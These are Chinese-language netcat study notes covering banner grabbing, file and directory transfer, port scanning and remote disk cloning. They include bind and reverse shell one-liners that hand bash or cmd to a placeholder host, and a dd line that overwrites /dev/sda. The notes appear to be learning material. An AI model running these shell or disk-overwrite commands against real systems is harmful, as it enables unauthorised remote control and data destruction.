netcat 学习笔记

侦听/传输

nc -nv x.x.x.x port
-n 数字显示ip
-v 详细信息

前提：需要进行链接
可以获取banner信息
软件开发商，软件名称、版本、服务类型等信息，通过这些信息可以使用某些工具直接去使用相对应的exp去攻击

nc -lp port
-l 监听模式
-p 指定打开端口

传输文本

pc1:  nc -lp port > xx.txt
重定向到txt文件
pc2: ls -l | nc -nv x.x.x.x port -q 1
将列出信息传输到pc1
-q 1 传输完成后1s退出       

传输文件

P1: nc -lp port > xx.mp4
P2: nc -nv x.x.x.x port < xx.mp4 -q 1
P2传P1
or
P1: nc -lp port < xx.mp4
P2: nc -nv x.x.x.x port > xx.mp4 -q 1
P1传P2

传输目录

P1: tar -cvf - dir/ | nc -lp port -q 1
P2: nc -nv x.x.x.x port | tar -xvf -

传输加密文件

P1: nc -lp port | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > xx.mp4
P2: mcrypt --flush -Fbq -a rijndael-256 -m ecb < xx.mp4 | nc-nv x.x.x.x port -q 1

流媒体服务

P1: cat xx.mp4 | nc -lp port
P2: nc -nv x.x.x.x port | mplayer -vo xll -cache 3000 -
传输3000字节

端口扫描

nc -nvz x.x.x.x num-num  默认tcp连接
nc -nvzu x.x.x.x num-num udp连接

远程克隆硬盘

P1: nc -lp port | dd of=/dev/sda
P2: dd if=/dev/sda | nc -nv x.x.x.x port -q 1

p2 克隆到 p1

远程控制

P1: nc -lp port -c bash(linux)或cmd(windows) 服务端	
P2: nc -nv x.x.x.x port 客户端

p2控p1

P1: nc -lp port
P2: nc -nv x.x.x.x port -c bash

P1控P2

netcat缺点：缺乏加密和身份验证的能力，可被嗅探